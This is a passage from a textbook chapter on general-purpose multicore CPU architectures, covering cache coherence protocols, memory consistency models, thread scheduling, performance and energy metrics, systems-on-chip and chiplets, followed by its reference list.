to access a different row in the same bank. FR-FCFS will look at all of the queued
requests and prioritize the requests from the first thread because their target row
is already activated. This causes all of the requests from the other threads to wait
longer in the queue and in extreme cases can lead to unintentional starvation for
these threads. To address this, researchers have proposed a number of memory
schedulers that explicitly augment the memory request metadata with a thread ID
and incorporate information about the thread into the scheduling algorithms. As
one example, the memory controller can use lightweight runtime metrics to predict
which threads are being slowed down due to memory interference and can prioritize
requests from these threads before prioritizing row locality (Mutlu and Moscibroda
2006).
Cache Coherence
a common alternative, store the update in the cache and send every update to the
next lower level. However, write-through caches are not commonly employed in
multicore CPUs due to the impact of the increased write traffic on interference.
The Need for Coherency with Write-Back Caches In a single-core CPU, write-
back caches ensure that the CPU core sees the most recent version of the data for
each cache block, as the core always starts memory lookups from the top cache level
in the memory hierarchy. However, with multicore CPUs, a dirty cache block stored
in one core’s private cache is not immediately visible to other cores in the CPU.
This is because if the same cache lookup procedure for single-core CPUs is used, a
multicore CPU’s core would access its own private caches and the shared last-level
cache and not the private caches of other cores. If left unmodified, this can lead to
correctness issues, as one core may ignore and potentially incorrectly overwrite the
updates from another core.
shared by both cores, even though their accesses are to different pieces of data. In
the case where both cores are trying to write to these pieces of data simultaneously,
the cache block will ping-pong (i.e., move back and forth) between the two cores,
with one core invoking an invalidation for the other core any time it wants to write
and vice versa. False sharing can be avoided only by ensuring that the two pieces
of data are mapped to different cache blocks (e.g., by having the programmer pad
data structure sizes to use up exact multiples of the cache block size). Second, if a
cache block is not currently held by a core in its private caches, the cache block is
assumed to be in a coherence state designated as invalid for that core (i.e., the core
cannot currently read from or write to that cache block).
In snoopy cache coherence (Goodman 1983), cores share a bus, and each core
maintains its own coherence state metadata. Each core reads all cache coherence
messages transmitted on the bus (i.e., it is snooping on all messages) to see if it
needs to react to the message (e.g., if it needs to write back any dirty changes to a
cache block and if it needs to invalidate the block). For example, if a core wants to
write to cache block x, it broadcasts a coherence message on the bus declaring its
intent to acquire write permissions. As only one core can have write permissions,
every other core on the bus will see the coherence message, and if a core has a copy
of cache block x, it will invalidate the block in all of its private caches. The other
cores require some form of acknowledgment mechanism to notify the requesting
core that it has completed any necessary actions or if it has an up-to-date version of
the data. Snoopy cache coherence is the simpler of the two approaches to implement
and works effectively when the CPU has a relatively low number of CPU cores, but
the broadcast-based bus scales poorly as the core count increases, both due to the
increased bus latency/energy and increased contention due to message serialization
on the bus.
Directory-based cache coherence (Censier and Feautrier 1978) avoids the poor
scaling of broadcasting by instead storing the coherence state metadata in a
directory. When a core triggers a coherence message, the message first goes to
the directory, which stores the state of the cache block in all cores serviced by the
directory. One example implementation is to maintain a bitvector for each cache
block currently held by any of the cores, where bit i in the bitvector indicates
18 General-Purpose Multicore Architectures 625
whether core i currently has a copy of the cache block. When the directory
receives a coherence message, it looks up the metadata for the requested block
and then dispatches follow-up messages to only those cores that currently hold
the cache block. While directory-based coherence is more complex to implement,
it exhibits scalability over snoopy coherence in multiple dimensions. First, as
mentioned above, coherence messages need to be transmitted to only the cores that
currently hold the data and can be implemented using more scalable interconnection
networks than a bus. Second, the directory can be partitioned into multiple slices,
with each slice responsible for a subset of memory addresses. Third, a CPU
can implement multiple levels of directories, creating a directory hierarchy that
further reduces coherence message traffic and metadata storage requirements. This
improved scalability makes directory-based coherence a good fit when there are a
large number of cores in the CPU.
I want to write
but don’t have a copy:
I want to write: tell others to invalidate
tell others to invalidate M and give me the data
I (and only I)
have a dirty
copy
S I
I (and maybe I don’t have a
others) have a I want to read: copy (maybe
clean copy tell others to write back any updates others do)
Someone else
wants to write
(or block is evicted)
Fig. 12 MSI protocol: solid lines are upgrades and dotted lines are downgrades
626 S. Ghose
cache block is in the shared state, multiple L1 caches can hold identical copies of the
cache block. Since none of the cores have permissions to write to the cache block,
this ensures that any core reading the cache block has the most recent version of the
data. When a thread running on one of the cores wants to write to the cache block, it
first sends a message to the other cores, informing them to downgrade to the invalid
state (i.e., to invalidate their copy of the cache block, if they have one). Once the core
receives acknowledgments of the invalidations, it upgrades its own copy of the cache
block to the modified state. (While not shown, practical cache coherence protocols
implement additional transient states, to indicate an in-progress upgrade/downgrade
while waiting for other cores to complete their requested state changes.) This now
ensures that only this core has a copy of the cache block and that the core can now
safely perform its write. If another core wants to read the now-modified cache block,
it will send out a read request, which will force the writing core to downgrade its
cache block from the modified state to the shared state and to make the updates
visible to the other cores.
One drawback of MSI is that even when only one core has a copy of the
cache block in the shared state, it must wait for acknowledgments from all of
the other cores before it can upgrade this cache block to the modified state.
This can potentially generate a large amount of unnecessary coherence traffic,
given the lack of other copies in the private caches. The MESI cache coherence
protocol (Papamarcos and Patel 1984) provides an optimization for this drawback,
by introducing a fourth state called exclusive, as shown in Fig. 13. If a core reads a
cache block into its private cache and no other private cache has a copy, the cache
block will have an exclusive state, indicating that the core can read from the block
and that no other private copy exists. If the core subsequently wants to perform a
write to the block, it can now silently upgrade the cache block (i.e., without sending
any coherence messages to other cores) to the modified state. To ensure correctness,
if a second core wants to read the cache block, the first core’s copy is downgraded
from exclusive to shared, indicating that there may be more than one core currently
holding a copy of the block.
I want to write:
no reason to tell others I want to write
but don’t have a copy:
I want to write: tell others to invalidate
E tell others to invalidate M and give me the data
I (and only I) I (and only I)
have a clean I want to read, have a dirty
copy and nobody has a copy copy
Someone else
wants to write
(or block is evicted)
Fig. 13 MESI protocol: solid lines are upgrades and dotted lines are downgrades. Transitions that
are unchanged from MSI are grayed out
each memory consistency model defines which possible memory interleavings can
be observed by a core. Regardless of the consistency model, each core must maintain
an ordering of loads and stores that does not violate true (i.e., read after write)
register dependencies, and because caches are part of the shared-memory state,
cache coherence is implemented. This section examines three popular types of
consistency models.
Sequential consistency (SC) (Lamport 1979) ensures that every core sees the
same ordering (i.e., interleaving) of individual memory operations. This is the
equivalent of cores going one at a time when performing a load or store, and that
load or store is considered part of the shared-memory state so that all cores see the
effect (though not all cores need to see the effect immediately). SC is often thought
of as one of the most intuitive models, but given its need for a globally consistent
interleaving, it can require a high overhead for implementation and is rarely used
for modern multicore CPUs.
Relaxed memory consistency models allow for some differences in orderings
observed by each core. One example of a relaxed model is total store ordering
(TSO) (SPARC International Inc. 1991), which was first developed for the SPARC
ISA and is used widely (albeit with some modifications) by the x86 ISA. In TSO,
a CPU core can observe its own write before other cores can, resulting in a slightly
different interleaving observed by each core. A key goal of TSO is to retain store
buffers in multiprocessors. For an out-of-order core, a store buffer holds stores that
have been committed but have yet to be written to the caches. In SC, the store
buffer is not considered part of the shared-memory state, and memory speculation
techniques that read data from the store buffer can require costly mechanisms to
squash and replay out-of-order load that violate the global interleaving. With TSO’s
628 S. Ghose
relaxation, there is no need for such costly mechanisms, and the write buffer is
considered part of the shared-memory state.
An example of an even more relaxed model is weak ordering (Dubois et al.
1986). Weak ordering allows most memory operations to be reordered but uses
programmer-invoked synchronization primitives to explicitly define reordering
boundaries. A popular synchronization primitive for weak ordering is a fence, which
is used to enforce orderings within a core (but does not explicitly synchronize across
cores, unlike a barrier). A fence has three guarantees: (1) All cores see the same
exact ordering of fence primitives, (2) all load and store instructions that come
before the fence in a thread must complete before the fence, and (3) no load or store
instruction that comes after the fence can complete until after fence takes place.
What this means is that for the loads and stores in between two fences, any ordering
of them can possibly occur. The programmer can explicitly insert more fences into
a thread to enforce a stricter ordering. The Arm ISA is an example architecture that
makes use of weak ordering.
Please refer to a detailed discussion (Nagarajan et al. 2020) for more information
about these and other memory consistency models.
for that thread (e.g., program counter, registers, predictor history) are initialized to
the starting state. The thread then executes until the end of the quantum, unless the
thread is preempted early (e.g., to execute an exception handler).
Assuming the typical conditions that no early preemption took place and that the
thread has not yet finished executing, at the end of the quantum, the OS invokes
the thread scheduler to select the thread for the next quantum. If the selected thread
is different from the currently running thread, the OS invokes a preemption of the
running thread, which is known as a context switch. During a context switch, the
OS copies the CPU state associated with the thread being preempted into memory
and loads in the CPU state for the thread being run next from memory. From the
perspective of the thread, the context switch gives the thread the illusion that it
never stopped executing. From the perspective of a user, PCs can often give them
the illusion that all of their threads are running concurrently on a single-core CPU,
by rapidly context switching between them, as the scheduling quantum is on the
order of milliseconds and is imperceptible to humans for the typical number of
concurrently running threads.
To extend thread scheduling for multicore CPUs, the individual cores are each
exposed to the OS. As an n-core CPU without multithreading has n hardware
contexts, the OS can schedule n threads for every quantum. (When a CPU supports
m-way multithreading, each way is typically exposed to the OS as its own hardware
context, meaning that an n-core CPU with m-way multithreading exposes n × m
hardware contexts.). Conventionally, OS schedulers treated hardware contexts as
identical to one another, but this introduces two challenges in modern multicore
CPUs.
First, while a context switch preserves and restores CPU state for a thread, this
state does not typically include the contents of the cache, because cache blocks are
meant to be quickly accessible copies of data that is available in other parts of the
system. However, it can be beneficial for a thread to be reassigned to a hardware
context that it was previously scheduled on, as the thread can take advantage of data
that it had previously cached. Conventional scheduling approaches would disregard
this and assign the thread to any available context. Processor affinity, sometimes
referred to as CPU pinning, overcomes this by allowing a user to assign a thread
for execution on only the user-specified hardware contexts (e.g., the user assigns
a thread to only one CPU core). The OS scheduler obeys the processor affinity
assignments, ensuring that the thread executes only on the selected contexts.
Second, as discussed further in “Heterogeneous CPU Cores,” modern multicore
CPUs no longer have homogeneous cores. As a result, the choice of hardware
context to assign to a thread can have a significant impact on its performance and
energy consumption (e.g., assigning a thread to a big core when it needs only a little
core). Early systems with two types of cores made the difference between cores
transparent to the OS: A single hardware context was associated with both a big core
and a little core, and the hardware would use the CPU frequency setting chosen by
the OS for the CPU (see Controlling CPU Core Frequency below) to decide whether
the thread should run on the big core or on the little core. Modern systems can have
630 S. Ghose
more than two types of CPU cores and often expose all of the CPU cores directly to
the OS. To manage these cores efficiently, OSes now include heterogeneity-aware
schedulers, such as the Energy Aware Scheduling approach available in modern
versions of the Linux kernel (Linux Kernel Organization 2023b).
Parallelizing Programs On the application side, there are two ways to take advan-
tage of the parallelism and efficiency offered by multicore CPUs. The first method
is to rewrite programs as multithreaded applications. Instead of writing a program
as a fully sequential series of functions, a programmer can identify opportunities
to perform some parts of the application concurrently. The programmer can use
threading libraries to either (1) explicitly spawn these parallel parts into independent
threads or (2) demarcate regions of the program that inform an advanced library
to automatically generate threads. Note that threads do not have to be fully
independent and that programmers can use synchronization primitives to coordinate
execution across threads (e.g., locks to protect critical section execution, barriers
to synchronize task or sub-task completion), as well as shared memory or message
passing to exchange information between threads. While this chapter does not go
into multithreaded programming in detail, there are other works (Mattson et al.
2004; Farooqi et al. 2022) that provide in-depth coverage of parallel programming
techniques and frameworks.
grammed execution, it is possible to use all of the cores in a multicore CPU even
if all of the applications are single-threaded, by allowing the processes to execute
in parallel. Most operating systems enable users to launch multiple processes
concurrently, and when a process starts (initially with one thread), the OS adds the
process’ thread to the list of all active threads for the OS to schedule (see Scheduling
Threads above). If a process is multithreaded, it will spawn additional threads over
time, which the OS will also add to its list of active threads. The OS scheduler will
typically not distinguish between threads belonging to the same process and threads
from other processes and will schedule as many threads as there are hardware
contexts.
While conventional metrics such as speedup have been widely used in the architec-
ture community for decades, several challenges make them difficult to directly apply
to multicore CPU evaluations. This section provides a summary of key challenges
for performance measurement and then discusses popular metrics that overcome
these challenges. It also briefly discusses metrics related to power and energy, given
their emphasis throughout the lifetime of multicore CPUs.
Ts
S(N) = (4)
Tp
632 S. Ghose
where Tp is the total execution time of the parallel version of the program for
N cores, and Ts is the total execution time of the sequential version of the program
(and not the parallel version with one core). The equation uses the sequential
version of the program to ensure that parallel speedup captures the overheads of
synchronization. As a result, S(1) can often be less than 1. Note that unlike with
single-thread applications, the IPC (instructions per cycle) of a program should
not be used as a substitute for execution time, as IPC values can be skewed by
synchronization traffic and other nondeterministic behavior.
A related metric is parallel efficiency, E(N):
Ts
E(N) = (5)
Tp × N
IPCalone
slowdown = (6)
I P Cshared
18 General-Purpose Multicore Architectures 633
where i and j are the members of the set of all applications in the workload.
Informally, a fairness of 1 indicates that all applications are experiencing an equal
slowdown, while at the other extreme, a fairness of 0 indicates that at least one
application is experiencing starvation. Note that unfairness in this case is defined as
the inverse of fairness.
Aggregate performance metrics for multiprogrammed workloads incorporate
some notion of both overall system throughput and fairness, in an attempt to remove
the bias mentioned above that can arise from using absolute IPCs. A popular metric
is weighted speedup (W S) (Snavely and Tullsen 2000; Eyerman and Eechkout
2008), which sums up the normalized speedups (i.e., the inverse of slowdown) of
each application i in the workload to represent system throughput:
IPCshared 1
WS = = (8)
IPCalone slowdowni
i i
WSafter_modification
WS improvement = (9)
WSbefore_modification
634 S. Ghose
H M represents the average slowdown in a user response (i.e., the turnaround time
for an output produced by the application) for each application in the workload due
to interference (Eyerman and Eechkout 2008). Like with W S, higher is better, and
to compare two systems and report an improvement, one should calculate the ratio
of H M values for the two systems.
Power and Energy While power and energy are related, they represent different
limiting factors experienced by modern computers. Power (P ) represents a rate
of work being completed and can be calculated as a function of current (I ) and
voltage (V ):
P =I ×V (11)
At a high level, power in a CPU can be broken down into a dynamic component (e.g.,
the power consumed due to the active switching of transistors to perform work,
short-circuit power consumed during gate switching when transistors temporarily
connect the high voltage rail to ground due to transistor timing variation) and a
static component (e.g., the leakage of power due to imperfections in the switching
behavior of a transistor). The section titled “Optimizing CPU Cores for Parallelism”
briefly discusses components that impact dynamic power. Note that in the past,
dynamic power was orders of magnitude larger than static power, so static power
was thought of as a trivial factor in total power consumption. Today, because
decades of Dennard Scaling translated to significant dynamic power reductions,
static power makes up a nontrivial fraction of total CPU power. Power consumption
has a direct correlation with thermal dissipation and is used as a proxy to quantify
the heat generated by the CPU. The areal power density, which divides the power by
the surface area of the CPU die, is used to determine how aggressive thermal cooling
solutions (e.g., heatsinks, liquid cooling, fans) need to be to remove dissipated
heat from the CPU and keep the die within safe thermal operating limits. While
areal power density is used at design time to provision heat dissipation capacity,
the CPU makes use of temperature readings from multiple sensors embedded at
various locations in both the CPU chip and the motherboard to dynamically control
heat dissipation management, including cooling intensity (e.g., fan speed) and CPU
power throttling.
While power consumption was the key concern during the early years of
multicore CPUs, energy emerged as a first-order concern during the 2010s. Energy
18 General-Purpose Multicore Architectures 635
(E) is the total electrical cost of performing a given amount of work and can be
calculated as a function of power:
E =P ×t (12)
where t is the time required to complete the defined amount of work. Challenges
associated with two extreme ends of computing platforms have resulted in the
growing emphasis on energy consumption, in addition to power consumption.
First, portable computers such as laptops and smartphones are battery-constrained,
as their available uptime depends on the total energy capacity of the computer’s
battery and the amount of energy that the system (including the CPU) consumes for
running applications. Second, the large number of servers in data centers and cloud
computing environments can result in exorbitant financial and environmental costs
to provide enough energy to perform user services. In both cases, reducing the total
energy used for a given application can result in more availability at a lower overall
cost. A related metric of interest is energy efficiency, which summarizes the energy
used for a single operation (e.g., an instruction, a microkernel), though one downside
of energy efficiency is the difficulty of defining an operation in an equal way across
platforms (e.g., two CPUs with different ISAs may not have equivalent instructions).
Several modern multicore CPUs contain ISA-compatible cores of heterogeneous
size and capability (see “Heterogeneous CPU Cores”), and dynamic energy and/or
energy efficiency metrics based on the characteristics of a thread are used to select
which of the heterogeneous cores will execute the thread.
In the years that have elapsed since the introduction of multicore CPUs, there
have been a number of innovations to the general microarchitecture described in
“Multicore CPU Hardware Design.” While some of these innovations have been
limited to specific manufacturers or models, others have become commonplace
across modern CPUs. This section highlights three of the most significant shifts in
multicore CPU design and leaves the exploration of other innovations as an exercise
for the reader. These three shifts are finding widespread acceptance in contemporary
multicore CPUs: (1) the integration of specialized components on-chip alongside the
general-purpose CPU cores into what are known as systems-on-chip (SoCs), (2) the
diversification of the constituent cores in a multicore CPU, and (3) the advent of
composable chiplets that can allow for the easy integration of many smaller silicon
dies in a single chip.
Systems-on-Chip
Just as the limits of areal power density and thermal dissipation were a key
motivator for the rise of multicore CPUs, a new pressure point that came to
636 S. Ghose
prominence a few years later ushered in the next key change. The emergence of
the smartphone drove a need to reduce total energy consumption, given the limited
battery capacities that were available in a portable form factor. To maximize energy
efficiency, smartphones made use of systems-on-chip (SoCs). A system-on-chip
tightly integrates many different components, which conventionally would have
been implemented using multiple chips for desktop and server computers, into a
single chip. Early SoC examples date back to the mid-1970s, such as the Intel
5810 (Intel Corp. 1976) introduced in 1974, and were designed to minimize battery
consumption in then-new electronic wristwatches. Over time, platform-specific
SoCs became relatively commonplace in the embedded systems community. Early
smartphones such as the original Apple iPhone, from 2007, made use of Samsung
SoCs that contained a single Arm CPU core, a graphics processing unit (GPU), and
caches integrated onto a single chip (Mannion 2007).
As the functionality and ubiquity of the smartphone expanded, their underlying
SoCs incorporated significantly more components, including more CPU cores. At
a high level, the goal of these additional components is to introduce specialization
for commonly performed operations, in order to significantly improve the efficiency
of these operations compared to executing them on a general-purpose CPU core.
Figure 14 shows several key components of the Apple A17 Pro SoC (Apple Inc.
2023), which started production in 2023 for use in the iPhone 15 Pro series of
smartphones. As the figure shows, the SoC contains six CPU cores (which are
heterogeneous; see “Heterogeneous CPU Cores”), a GPU, multiple fixed-function
accelerators (a neural engine for machine learning inference, an image signal
processor for photo processing, a video codec engine for video recording and
streaming, a display engine for screen image generation), I/O interfaces (including
a dedicated USB controller), a system-level cache (an LLC that is available to the
CPU, GPU, and all accelerators), and four LPDDR5X memory controllers.
The process of identifying which components to include in the SoC (beyond the
basic CPU and GPU) makes use of profiling tools. These tools can monitor the
performance (and often the energy) of an existing chip as one or more applications
execute. To do this, modern profiling tools make use of hardware performance
counters, which are registers built into the chip logic to track various events taking
place during execution. For SoC design, profiling can identify the applications
or application kernels that are bottlenecked by the existing chip, which become
candidates for acceleration using dedicated SoC components. Of these candidates,
a subset of them is chosen for dedicated acceleration based on a combination
of factors, including the frequency of application/kernel usage, the area required
for a fixed-function accelerator, available chip area, power and energy budgets,
and the availability of existing accelerator designs (including the availability of
third-party designs known as IP cores, where IP stands for intellectual property).
Note that even among state-of-the-art SoCs that target the same platform, the
exact components can vary. As one example, Qualcomm’s Snapdragon 8 Gen 3
SoC (Qualcomm Technologies 2024) for smartphones integrates a 5G cell modem,
Wi-Fi and Bluetooth transceivers, and security accelerators in the chip and makes
use of a different combination of heterogeneous cores than the A17 Pro.
18 General-Purpose Multicore Architectures 637
heterogeneous CPU cores first became popular for mobile SoCs, it can now be seen
in a wide range of modern multicore CPUs. For example, Intel’s 12th generation of
Core CPUs introduced heterogeneous CPU cores (named P-cores and E-cores) for
desktop computers (Rotem et al. 2021).
Beyond the cores themselves, the success of SoCs have demonstrated the benefits
of maximizing energy efficiency through directed specialization. However, there
remains a tension between high degrees of specialization and non-recurring engi-
neering (NRE) costs, such as those involved with design, layout, and verification.
As a simple motivating example, let us revisit the tiled multicore design from
“Optimizing CPU Cores for Parallelism.” While tiling helps reduce NRE costs, the
tile is a fixed design: For one core, there is a fixed amount of L1 instruction and
data caches, L2 cache, and potentially LLC slice. If a manufacturer wants to adapt
this tile for a platform whose workloads do not exhibit significant locality, they may
want to significantly reduce the cache sizes, but doing so requires a new tile to be
designed and verified. Moreover, the die that is etched for a multicore CPU will
Fig. 14 Selected
components in the Apple A17 DRAM Display Video Codec DRAM
Pro system-on-chip. Note that Ctrlr. Engine Engine Ctrlr.
components may not be to
scale with each other
2
High-Performance 6-Core
CPU Cores Graphics Processing
3.78 GHz
Unit
(GPU)
4 High-Efficiency
CPU Cores
2.11 GHz
System-Level Cache
(SLC)
Shared SRAM
I/O USB
Intf. Image Ctrlr.
16-Core Signal
Neural Engine Proc.
DRAM (ISP) DRAM
Ctrlr. Ctrlr.
18 General-Purpose Multicore Architectures 639
have a fixed number of tiles laid out, again restricting the flexibility of the CPU and
requiring nontrivial NRE costs if a die with a different core/tile count is needed.
The advent of chiplets provides a new way to compose a multicore CPU in a
more modular fashion, avoiding some of these NRE costs. A chiplet is a small die
that contains a subset of the functionality that would be contained in a standard
die. Instead of laying out a multicore CPU design using a monolithic die, designers
can design smaller chiplets with individual components, such as cores or caches.
For example, in place of a single die containing eight cores and their associated
caches, a chip for a multicore CPU could be composed using eight core chiplets,
eight L1 cache chiplets, eight L2 cache chiplets, and 16 LLC slice chiplets. If the
manufacturer now wants a multicore CPU with fewer cores and larger caches, they
can reuse the chiplets to compose a chip with two core chiplets, 16 of the L1 and L2
cache chiplets each, and 64 LLC slice chiplets. While chiplets are one example of
a broader concept called multi-chip modules (MCMs), which has been around for
decades, it was conventionally difficult to have more than a handful of dies in an
MCM due to packaging costs and alignment issues. Recent advances in interposer
design, where an interposer provides a substrate with many short-distance wires to
connect dies together, have reduced manufacturing costs, complexity, and faults for
assembling many dies in one MCM.
Chiplets offer four advantages for manufacturing. First, as already discussed,
chiplets allow for modular components that can be reused and resized after the dies
have been fabricated, at low cost. Second, chiplets can allow for dies fabricated
using different manufacturing process technologies to be connected together into
a single package (this is known as heterogeneous integration). If, for example, the
cache does not need to be manufactured using the state-of-the-art manufacturing
process, manufacturers can reduce costs by fabbing the chip using an older, cheaper
process. Third, overall yield increases, because a silicon fault is now isolated to a
much smaller chiplet, which can be replaced at much lower cost than disposing of
an entire die. Fourth, with the breakdown of Dennard scaling (Dennard et al. 1972,
1974), dies are now growing in size to continue scaling up the total transistor count,
but these sizes are approaching the reticle limits (i.e., the largest possible chip that
can be etched) of our lithography equipment. Chiplets can overcome these limits by
allowing for multiple larger chiplet dies to be composed into a package, where the
total area of the chiplets is significantly larger than what any one die could be.
Several manufacturers have started incorporating chiplet-based design for mul-
ticore CPUs. AMD has been responsible for significant innovation in the area of
chiplets and interposer design and has been manufacturing chiplet-based multicore
CPUs starting with the first-generation EPYC CPUs in 2017 (Naffziger et al. 2021).
Figure 15 shows die shots of the AMD EPYC 7702 CPU, released in 2019, which
consists of nine chiplets: eight core complex dies (CCDs), fabricated in a 7 nm
process, with eight cores (and their private caches and LLC slices) per CCD, and
a single I/O die in the center, fabricated in a 14 nm process, with memory and I/O
controllers. Apple and Intel have also announced the incorporation of chiplet-based
design into their latest multicore CPUs (Smith et al. 2022; Rodgers et al. 2024).
640 S. Ghose
Fig. 15 Lidded, delidded, and infrared views of the AMD EPYC 7702 CPU and its chiplets (Fritz
2019)
Conclusion
The rise of multicore CPUs highlighted a key shift in the computer architecture
community, as concerns about thermal dissipation and limitations of ILP hastened
a collective change in mindset about the importance of power and the potential
of parallel processing. Innovations in multicore CPU design have led to reduced
design and verification effort, support for specialized hardware accelerators, and
increased composability of modular components. Today, multicore CPUs can be
found across most modern computers, ranging from embedded platforms and
smartphones, through personal laptops and desktops, to large-scale distributed
computing environments. Combined with the emergence of simplified parallel
programming frameworks, multicore CPUs have led to commonplace exploitation
of thread-level parallelism, delivering significant performance improvements while
maintaining reasonable power and energy budgets. Multicore CPUs are expected
to continue evolving over the next several decades, as recent trends toward CPU
specialization (particularly in the modern CPU landscape with systems-on-chip and
chiplet-based fabrication) open up new opportunities for maximizing the efficiency
and performance of the next generation of computing platforms.
Acknowledgments The author thanks Ryan Wong, Sudhanshu Agarwal, Yiqiu Sun, and Minh S.
Q. Truong for reviewing multiple versions of this chapter and providing helpful feedback.
References
Amdahl GM (1967) Validity of the single processor approach to achieving large-scale computing
capabilities. In: SJCC
Anderson JP, Hoffman SA, Shifman J, Williams RJ (1962) D825 – a multiple-computer system for
command & control. In: FJCC
Apple Inc. (2023) Apple event, 12 Sept 2023. https://www.apple.com/apple-events/
Backes L, Jiménez DA (2019) The impact of cache inclusion policies on cache management
techniques. In: MEMSYS
Balasubramonian R (2019) Innovations in the memory system. Springer Nature Switzerland
18 General-Purpose Multicore Architectures 641
Huang M, Mehalel M, Arvapalli R, He S (2013) An energy efficient 32-nm 20-MB shared on-die
L3 cache for Intel® Xeon® Processor E5 family. In: JSSC
Intel Corp. (1976) 5810A Single Chip LCD Time/Seconds/Date Watch Circuit, datasheet. In: Data
catalog
Intel Corp. (1989) i486 Microprocessor, datasheet, Order Number 240440-002
Intel Corp. (1999) Intel Pentium III Processor 600 MHz, 512K Cache, 100 MHz FSB. https://ark.
intel.com/content/www/us/en/ark/products/27545/intel-pentium-iii-processor-600-mhz-512k-
cache-100-mhz-fsb.html
Intel Corp. (2004) Intel Pentium 4 Processor 570J Supporting HT Technology. https://ark.intel.
com/content/www/us/en/ark/products/27475/intel-pentium-4-processor-570j-supporting-ht-
technology-1m-cache-3-80-ghz-800-mhz-fsb.html
Intel Corp. (2006) Intel Core 2 Duo Processor E6700. https://ark.intel.com/content/www/us/en/ark/
products/27251/intel-core-2-duo-processor-e6700-4m-cache-2-66-ghz-1066-mhz-fsb.html
JEDEC Solid State Technology Assn. (2020) JESD235C: High Bandwidth Memory (HBM)
DRAM
JEDEC Solid State Technology Assn. (2024) JESD79-5C: DDR5 SDRAM Standard
Joyce TF, Kelly RP, Shen J-K, Raguin MM (1987) Multiprocessors on a Single Semiconductor
Chip. U.S. Patent 4 942 547
Kim C, Burger D, Keckler SW (2002) An adaptive, non-uniform cache structure for wire-delay
dominated on-chip caches. In: ASPLOS
Kim S, Chandra D, Solihin Y (2004) Fair cache sharing and partitioning in a chip multiprocessor
architecture. In: PACT
Kim W, Gupta MS, Wei G-Y, Brooks D (2008) System level analysis of fast, per-core DVFS using
on-chip switching regulators. In: HPCA
Kroft D (1981) Lockup-free instruction fetch/prefetch cache organization. In: ISCA
Kumar R, Farkas KI, Jouppi NP, Ranganathan P, Tullsen DM (2003) Single-ISA heterogeneous
multi-core architectures: the potential for processor power reduction. In: MICRO
Lamport L (1979) How to make a multiprocessor computer that correctly executes multiprocess
program. IEEE Trans Comput
Leiner AL (1952) System Specifications for the DYSEAC. U.S. Nat’l. Bureau of Standards, Tech.
Rep.
Lempel O (2011) 2nd Generation Intel® Core™ Processor Family: Intel® Core™ i7, i5 and i3. In:
Hot Chips
Linux Kernel Organization, Inc. (2023a) Capacity Aware Scheduling. In: The Linux Kernel
Documentation, https://docs.kernel.org/scheduler/sched-capacity.html
Linux Kernel Organization, Inc. (2023b) Energy Aware Scheduling. In: The Linux Kernel
Documentation. https://docs.kernel.org/scheduler/sched-energy.html
Longergan W, King P (1961) Design of the B 5000 System. Datamation, May 1961
Luo K, Gummaraju J, Franklin M (2001) Balancing throughput and fairness in SMT processors.
In: ISPASS
Macken P, Degrauwe M, Van Paemel M, Oguey H (1990) A voltage reduction technique for digital
systems. In: ISSCC
Mannion P (2007) Under the Hood: Inside the Apple iPhone. EE Times
Mattson TG, Sanders BA, Massingill BL (2004) Patterns for parallel programming. Addison-
Wesley Professional
Menabrea LF (1842) Notions sur la machine analytique de M. Charles Babbage. Bibliothèque
universelle de Genève
Minneapolis–Honeywell DATAmatic Division (1960) Honeywell 800 Programmers’ Reference
Manual
Moore GE (1965) Cramming more components onto integrated circuits. Electronics
Moore GE (1975) Progress in digital integrated electronics. In: IEDM
Mutlu O, Moscibroda T (2006) Stall-time fair memory access scheduling for chip multiprocessors.
In: MICRO
18 General-Purpose Multicore Architectures 643
Naffziger S, Beck N, Burd T, Lepak K, Loh GH, Subramony M, White S (2021) Pioneering chiplet
technology and design for the AMD EPYC™ and Ryzen™ processor familie. In: ISCA
Nagarajan V, Sorin DJ, Hill MD, Wood DA (2020) A primer on memory consistency and cache
coherence, 2nd edn. Springer Cham
National Semiconductor Corp. (1982) COP2440/COP2441/COP2442 and COP2340/COP2341/
COP2342 Single-Chip Dual CPU Microcontrollers, datasheet. In: COPS microcontrollers
databook
Olukotun K, Nayfeh BA, Hammond L, Wilson K, Chang K (1996) The case for a single-chip
multiprocessor. In: ASPLOS
Papamarcos MS, Patel JH (1984) A low-overhead coherence solution for multiprocessors with
private cache memories. In: ISCA
Qualcomm Technologies, Inc. (2024) Snapdragon 8 Gen 3 Mobile Platform, product brief
Rixner S, Dally WJ, Kapasi UJ, Mattson P, Owens JD (2000) Memory access scheduling. In: ISCA
Rodgers L, Clark D, Joiner S, Haslett B, de la Torre Arenas I, Learner S (2024) Inside the miracle
of modern chip manufacturing. Financ Times
Rojas R (1996) Konrad Zuse’s legacy: the architecture of the Z1 and Z3. IEEE Ann Hist Comput
Ronen R, Mendelson A, Lai KK, Lu S-L, Pollack FJ, Shen JP (2001) Coming challenges in
microarchitecture and architecture. Proc IEEE
Rotem E, Mandelblat Y, Basin V, Weissmann E, Gihon A, Chabukswar R, Fenger R, Gupta M
(2021) Alder Lake architecture. In: Hot chips
Schmidt U, Caesar K (1991) Datawave: a single-chip multiprocessor for video applications. IEEE
Micro
Smith AJ (1982) Cache memories. ACM Comput Surv
Smith MS (2022) Single-chip processors have reached their limits. IEEE Spectr (2022)
Snavely A, Tullsen DM (2000) Symbiotic jobscheduling for a simultaneous multithreaded
processor. In: ASPLOS
Sohi GS, Breach SE, Vijaykumar T (1995) Multiscalar processors. In: ISCA
Sohi GS, Franklin M (1991) High-bandwidth data memory systems for superscalar processors. In:
ASPLOS
SPARC International Inc. (1991) The SPARC architecture manual, version 8
Taub AH, Gillies DB, Meagher RE, Muller DE, McKay RW, Nash JP, Poppelbaum WJ, Robertson
JE (1957) On the design of a very high-speed computer. University of Illinois Digital Computer
Laboratory, Tech. Rep. 80
Tendler JM, Dodson JS, Fields Jr JS, Le H, Sinharoy B (200) POWER4 system microarchitecture.
IBM J Res Dev
Thornton JE (1964) Parallel operation in the Control Data 6600. In: FJC
Torrellas J, Lam MS, Hennessy JL (1990) Shared data placement optimizations to reduce
multiprocessor cache miss rates. In: ICPP
Waingold E, Taylor M, Srikrishna D, Sarkar V, Lee W, Lee V, Kim J, Frank M, Finch P, Barua R,
Babb J, Amarasinghe S, Agarwal A (1997) Baring it all to software: Raw machines. Computer
Whitney DC, White Jr CH (1968) Time-sharing services. Mod Data Syst
